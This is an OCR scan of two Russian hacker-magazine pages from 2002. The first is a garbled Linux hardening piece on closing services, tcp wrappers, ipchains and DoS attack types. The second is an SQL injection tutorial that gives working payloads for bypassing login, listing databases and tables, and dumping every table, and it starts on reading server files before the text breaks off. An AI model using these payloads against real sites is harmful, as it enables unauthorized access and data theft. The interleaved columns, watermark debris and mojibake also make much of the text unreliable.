Кроме того, хочу, чтобы ты взял себе на за-

 

 

 

 

 

 

 

ря на их значимость, они очень подвержены сетевым

 

 

netstat -tap |grep LISTEN,

 

 

 

 

 

метку супер секьюрный протокол ssh на заме-

 

 

 

 

 

 

 

атакам. Если ты юзаешь Сендмейл, то сразу преду-

 

 

это выдаст тебе список запущенных сервисов на дан-

 

ну "слабому" и небезопасному телнетовско-

 

 

 

прежу, что этот сервис имеет такую огроменную ис-

 

ный момент. Если список чересчур длинный, то все-

 

 

му. Как известно, телнет ВООБЩЕ не шифру-

 

 

 

торию взломов, что убедись, что у тебя последняя

 

 

рьез стоит подумать об отключении некоторых сер-

 

ет передаваемые по нему пароли и прочую

 

 

 

его версия. Свежак всегда тебя ждет на

 

 

висов. Если у тебя есть сомнения в предназначении

 

инфу, в отличие от ssh. Кроме того, в этом

 

 

 

http://www.sendmail.org. Íî âñå-òàêè ýòî íå ïî-õàö-

 

какого-либо сервиса, набери команду

 

 

 

 

протоколе

имеется возможность

передачи

 

 

 

 

 

керски. И в лом каждый раз скачивать новую версию

 

 

grep '^finger' /etc/inetd.conf

 

 

 

 

 

файлов-scp

на замену

небезопасному FTP.

 

 

 

 

 

 

 

сендмайла, и еще туева хуча причин. Короче, пореко-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

< Взлом >20/04\02

62 Ньюсы 1 Феррум 2 PC_Zone 3 X-Стиль 4 Взлом

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

 

 

F

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

i

 

 

 

 

ХАКЕР\¹40\Апрель\2002P

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

D

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

 

 

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

< Folder2>

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мендую вместо sendmail юзать qmail. Он достаточ-

FTP и Telnet. Но раньше мы решили на замен про-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

но быстрый, стабильный

и, главное, секьюрный.

стому Телнету юзать секьюрный ssh. Поэтому в

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Ñàéò http://www.qmail.org.

 

 

/etc/hosts.allow добавляем:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ALL: 127.0.0.0/255.255.255.0

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

DOS-АТАКИ

 

 

sshd: ALL

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Это, во-первых, позволяет использовать ЛОКАЛЬ-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Хотя я думаю, что все читатели ][ и знают, что это

НОМУ хосту любые сервисы, но, кроме того, разре-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

такое, тем не менее поясню. DoS (отказ от обслу-

шает использование ssh-протокола с любого места.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

живания) атаки - это такие атаки, целью которых

Затем неплохо бы проверить, что ты натворил :).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

является выведение какого-либо ресурса из рабо-

Рекомендую тебе пойти на сайт http://grc.com и по-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

чего состояния ввиду многократных запросов на

сканить свой комп; если ты все настроил правиль-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

него. Приведу список наиболее распространенных

но, то количество слабых ресурсов на твоем компе

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

DoS-àòàê:

 

 

должно практически свестись к нулю.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

1. SYN FLOOD - это многократные запросы на

ПОЛЕЗНЫЕ ТУЛЗЫ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

соединение с твоей машиной. Название по-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

шло из-за одноименного флажка при переда-

1. Nmap - об этой тулузе мы писали неодно-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

че данных по протоколу TCP/IP.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

кратно, но и я никак не могу не упомянуть о

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2. Pentium "F00F" Bug - это такая атака, ког-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ней, она должна быть у каждого. Смотри:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

да процессору (думаю, ты догадался какому

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

она позволяет сканировать TCP-порты не-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

:) посылают коды на ассемблере ребутнуть

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сколькими методами, определять Ось на

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

компьютер. Но не проходит для 2 Пней или

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

удаленном компе, проверяет на наличие от-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Пня Про. Срочно нужен апгрейд ядра до Linux

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

крытых портов. Кроме того, она легка в ис-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

kernel 2.0.33.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пользовании. Короче, must have for all. Ска-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

3. Ping Flooding - это простой флудинг ICMP

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

÷àòü

 

ñ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пакетами. Чтобы его

предотвратить,

âîñ-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://www.insecure.org/nmap/index.html

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пользуйся тулзенками типа tcpdump, чтобы

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2. Nessus - относится к таким сканнерам,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

отследить, откуда приходят пакеты, и нака-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

которые быстро находят любые уязвимости

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

зать засранца :).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

в сети. Он состоит из клиента и сервера.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Есть еще несколько атак, но я на них останав-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Кроме защиты, его можно использовать и

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ливаться не буду, скажу лишь только, что от

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

для атаки, в нем заложено более 200 их раз-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

большинства им подобных тебя спасет мо-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

новидностей. Рекомендую. Скачать можно с

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дернизация ядра до 2.0.33

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://www.nesus.org

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

(ftp://ftp.kernel.org).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

3. Ну и, наконец, сниффер. Думал я, какой

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

FIREWALL PROTECTION

 

 

тебе предложить, и остановил свой выбор

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

на Sniffit. Он входит в поставку Линукса по

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Самый примитивный вид начинающейся атаки на

дефолту, работает на многих осях и дейст-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вительно может многое.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

компьютер есть простой скан его на наличие откры-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тых портов и расшаренных ресурсов. Дабы этого (и

DANGEROUS

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

не только этого) избежать, очень рекомендую ис-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пользовать фаерволл. Безопасность достигается

Как говорится, береженого Бог бережет, но даже

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

благодаря тому, что файер всегда стоит между ком-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

после того, как ты настроил секьюрность

своего

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пьютером и Инетом на пакетном уровне. В Linux

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

любимого Линукса, это не означает, что опасность

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2.2.x

kernel существует встроенный и достаточно

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

больше не грозит. Жизнь - штука непредсказуемая.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

неплохой фаерволл - Ipchains. Благодаря грамотной

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Так что же делать, если опасность настигла твой

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

его настройке вместе с продуманным использова-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

комп и хацкер получил доступ к нему? Хотя это за-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нием /etc/hosts файла, можно навсегда предотвра-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

висит от конкретных случаев, несколько общих со-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тить порт-сканинг и конннект на твой комп. Скрип-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ветов все же позволю себе дать. Для начала отсое-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ты, которые практически настроят фаерволл, лежат

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

динись от Инета, не медля ни секунды. Затем по-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

на http://www.nerdherd.org/ipchains. Потом должна

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

смотри системные логи в /var/log. Не забудь загля-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

следовать несложная его

настройка, добавление

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нуть в history file, чтобы увидеть, если таковой име-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

разрешенных портов и т.д. Затем поставь каждый

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ется, доступ с аккаунта какого-либо юзверя. Немед-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

раз его на запуск добавлением в /etc/rc.d/rc.local

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ленно убей все процессы и сервисы, идущие под

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

file строки:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

этим аккаунтом. Просмотря все логи и проанализи-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Setup IP Chains

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ровав ситуацию, добавь

атакующий хост,

вернее

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/usr/local/ipchains-firewall/masquerade

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ip-маску, в hosts.deny. И, главное, никогда не теряй

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Теперь осталось немного пошаманить с файлами

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

присутствия духа, Х тебе всегда придет на помощь,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/etc/hosts.deny и /etc/hosts.allow. В первом файле

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

êàê ×èï è Äåéë :).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

добавь ALL: ALL, что заблокирует все порты для не-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

санкционированных соединений. Но теперь стоит и

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

запрет на такие часто используемые сервисы, как

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

< Взлом >20/04\02

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ì

2 PC_Zone

3 X-Стиль

4 Взлом

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

F

 

 

 

 

 

 

 

 

t

 

P

 

 

 

 

 

 

 

 

 

i

 

 

 

 

ХАКЕР\¹40\Апрель\2002P

 

 

 

 

 

 

 

i

 

D

 

 

<Page 066>

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

 

 

 

D

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

Взлом

 

 

 

 

to

BUY

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

 

 

 

Как ломается SQL

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

g

.c

 

 

 

.

 

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

df

 

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

КАК ЛОМАЕТСЯ SQL

Базы данных:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

VOY (voy@satanic.com)

мегабайты удовольствия

Абсолютно безопасных систем не бывает. Это же касается и баз данных. Но зачем напрягаться, компилируя кучу эксплоитов, и, почесывая лысину, искать ошибки по всему компьютеру, на котором и хранится база данных, если можно совершить взлом, используя только внутренние возможности сервера базы данных. И такая техника взлома называется SQL Injection. Об этом и поговорим.

< Folder1 >

Это просто

При словах “База данных” у многих людей в первую очередь возникают ассоциации с вшивыми бородатыми программистами, ваяющими программы для всяких мелких контор. Да и вообще, бытует мнение, что БД - редкая вещь, которая используется разными извращенцами для своих извращенческих нужд. Это не так. Базы данных в Интернете используются повсеместно, хранится в них все что угодно, начиная от сообщений в гостевой книге и заканчивая номерами кредитных карт. Но раз есть базы данных, значит - есть и ошибки в них. Самое интересное: когда программисты пишут cgiприложения, то в основном делают упор на безопасность работы именно самого приложения (т.е. чтобы не было всяких там \..\ и прочих морально устаревших глюков), но, как показывают статистические исследования, пока мало кто обращает внимание на безопасность обмена информацией между приложением и базой данных. Если подумать глобально, то эту информацию можно перехватить только используя снифферы, но в 99% процентах случаев возможности установить их на атакуемой машине нет.

И не надо сейчас расстраиваться, речь пойдет вовсе не о снифферах, разговор будет обо всех странных возможностях серверов баз данных, позволяющих полу- чить любую информацию на атакуемой машине (да-да, ты узнаешь, какого цвета админ носит трусы :). Рассматривать все возможности всех типов баз данных в одной статье просто теоретически невозможно, и поэтому я остановлюсь на самом популярном типе БД - SQL.

Сама SQL имеет длинную историю и огромное коли- чество фенечек, фишечек и прибамбасов, и о всех них не знают даже сами разработчики SQL (файл changelog в дистрибутиве весит 130 кб). Но чаще всего о них не знают горе-программисты, пишущие приложения для работы с такой базой данных.

По статистике в Интернете около 60% приложений, работающих с различного рода БД, подвержены атакам, позволяющим модифицировать запрос к БД и заставить ее работать не совсем корректно. И этот класс атак называется SQL Injection атаками. Эта уязвимость не просто повсеместно распространена, она есть даже в таких неприступных крепостях, как серверы статистики многих провайдеров - у одного крупного воронежского прова эта уязвимость не просто есть, она у него в классическом виде, именно в таком, в каком ее использовать сможет абсолютно любой человек. (Оффтопик: Да, дибилизм - это заразно. Мало того, что у него дырявая база данных, так у него еще и НТ четвертая вместе со всеми примерами и

сэмплами поставлена. Не знаю, лечится ли это, но в данном случае скорее всего - нет.)

Действуем

Ну да ладно, немного я увлекся. Для проверки приложения на вшивость (например, скрипта какого-нибудь онлайн-магазина) сначала корректно заполни все поля для ввода, а потом по очереди подставляй в конец каждого поля кавычку (‘). Если после отправки заполненной таким корявым образом формы на сервер тебе выпрыгнет сообщение об ошибке

Microsoft OLE DB Provider for ODBC Drivers (0x8004CC14)

[Microdoft][ODBC SQL Server Driver][SQL Server][Unclosed

quotation mark before the character string “)’. /default.asp, line 239

или что-нибудь очень похожее, то мы на верном пути и флаг нам в руки.

Теперь представим, как идет обмен данными между SQL-сервером и нашим глючным приложением. Вот тебе уязвимый кусочек asp-кода, не запрещающий sql injection:

var sql = “select * from users where

username = ‘“ + username + “‘ and password = ‘“ + password + “‘“;

Таким образом, если username=vasya è password=pupkin, то все сработает корректно и без ошибок и asp-скрипт передаст SQL-серверу команду

select * from users where username=’vasya’ and password=’pupkin’

Но ежели мы наглым образом сделаем своим именем пользователя vasya’, то команда станет такой:

select * from users where username=’vasya’’ and password=’pupkin’

После этого запроса SQL глюканет и выдаст нам ошибку, мол мы кавычек слишком много насажали. Теперь будем думать логически: нам нужно обойти проверку имени и пароля в этом скрипте, т.е. отбросить кусок запроса “and password=’pupkin’”. Разра-

< Взлом >20/04\02

ботчики SQL все уже придумали до нас, и нам всего лишь остается закомментировать этот хвост. В языке SQL все комментарии начинаются с двух минусов (— ), и все, что идет после них, сервер в расчет не берет; т.е. чтобы заставить рассмотренный выше кусочек asp’a пустить нас без пароля вместо юзернейма “vasya”, надо будет вписать вот такую байду:

“vasya’; — “ (без кавычек, естественно)

Теперь разберемся, какой символ что тут означает. Кавычка после vasya закрывает поле username; точка с запятой говорит, что в данный момент у нас это конец всей команды; а два минуса показывают, что можно забить на все идущее после них.

Смотрим кишки базы

Так, без пароля нас уже пускают, но это еще не все, что можно сотворить с атакуемой машиной. Для нача- ла нам нужно узнать, какие базы данных есть на удаленной машине. Чтобы это узнать, возвращаемся к нашему полю для ввода username’a и пишем туда такую вещь:

“vasya’; show databases; —” (опять же без кавычек)

Если после отправки такой формы на сервер тебе вывалится списочек, чем-то похожий на этот:

mysql> show databases; +—————+

| Database | +—————+

| MYSQL

|

| TEST

|

| voy |

 

+—————+

3 rows in set (0.00 sec)

то мы не просто на верном пути, мы лошадиными шагами движемся к получению свопа всех баз данных на сервере. Я думаю, посланную команду подробно разбирать не надо, тут все не сложно, только одна маленькая заметка: в языке SQL в одной строчке может быть несколько команд, разделенных точками с запятыми. Этим-то мы в основном пользоваться и будем. После того как мы узнали список баз данных, нам нужно увидеть список таблиц в каждой из них. Чтобы осуществить такую задумку, в поле username пишем:

66 Ньюсы 1 Феррум 2 PC_Zone 3 X-Стиль 4 Взлом

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

“vasya’; use mysql; show tables; — “ “vasya’; use test; show tables; — “ “vasya’; use voy; show tables; — “

Команда use <database> в данном случае заставляет SQL переключиться на заданную базу данных, а команда show tables показывает нам список всех таблиц в этой базе данных.

Тащим любые файлы с сервера

Так, структуру БД на удаленной машине узнали, теперь осталось поиметь всю информацию. Для осуществления этого противозаконного действия опять в поле username пишем:

“vasya’; select * from table1; — “ (где table1 - существующая таблица в БД)

И вот таким макаром по очереди сливаем информацию из каждой таблицы.

В принципе на такой удаче можно остановиться, но SQL - безграничное поле для всяких извращений. Ее можно заставить вытворять все, что душе пожелается - от чтения любого файла с диска до работы с реестром в виндах.

Для первого раза попробуем схватить какой-нибудь файл с диска. Для этого тебе нужны будут права на создание таблиц и запись в них. Сначала создадим подопытную таблицу, при помощи которой будем хватать любой файл с диска. Создаем ее уже привыч- ным способом: в поле username пихаем:

“vasya’; create table dead_gibbon (tab1 varchar(200), tab2 varchar(200), tab3 varchar(200));

Вот мы создали таблицу с тремя столбцами. Небольшой комментарий: выражение “tab1 varchar(200)” говорит, что надо создать столбец с именем tab1 и максимальным значением 200. Теперь осталось воткнуть в свежесозданную таблицу требуемый файл

